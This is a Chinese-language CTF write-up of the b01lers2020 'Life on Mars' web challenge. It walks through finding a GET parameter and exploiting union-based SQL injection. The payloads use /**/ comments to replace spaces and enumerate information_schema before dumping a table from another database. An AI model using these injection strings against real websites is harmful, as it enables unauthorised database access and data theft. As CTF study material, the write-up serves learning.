[b01lers2020]Life on Mars （难发现的sql注入）

[b01lers2020]Life on Mars

打开界面以后，查看各种都没有提示，果断扫描目录，但也是没获得什么。

到这里只能burp抓个包看看

 

 抓包两个界面发现了get传参，考虑是否存在sql注入

尝试额以后发现只返回了一个1，试一下别的引号闭合

直接union select 1,2#发现出现了回显位

 

这里burp中sql注入不能出现空格,需要用/**/ 或者%20代替

直接进行查询所有的数据库名

search=hesperia_planum/**/union/**/select/**/database(),group_concat(schema_name)/**/from/**/information_schema.schemata#

 

 看一下alien_code数据库

?search=hesperia_planum/**/union/**/select/**/database(),group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema="alien_code"#

发现code表

?search=hesperia_planum/**/union/**/select/**/database(),group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name="code"#

 

 ?search=hesperia_planum/**/union/**/select/**/group_concat(id),group_concat(code)/**/from/**/alien_code.code#

这里是因为不是当前的数据库，表名前面需要加数据库的前缀

总结：这道题难得不在sql注入，注入没有一点得过滤，最多是绕了个弯在别的数据库的表中，难得是找到sql注入的这个点，一般遇到这种界面就会f12源码查看信息，然后扫目录，最后burp查看一下界面，这种题目一般以xml实体注入较多，这里长个记性。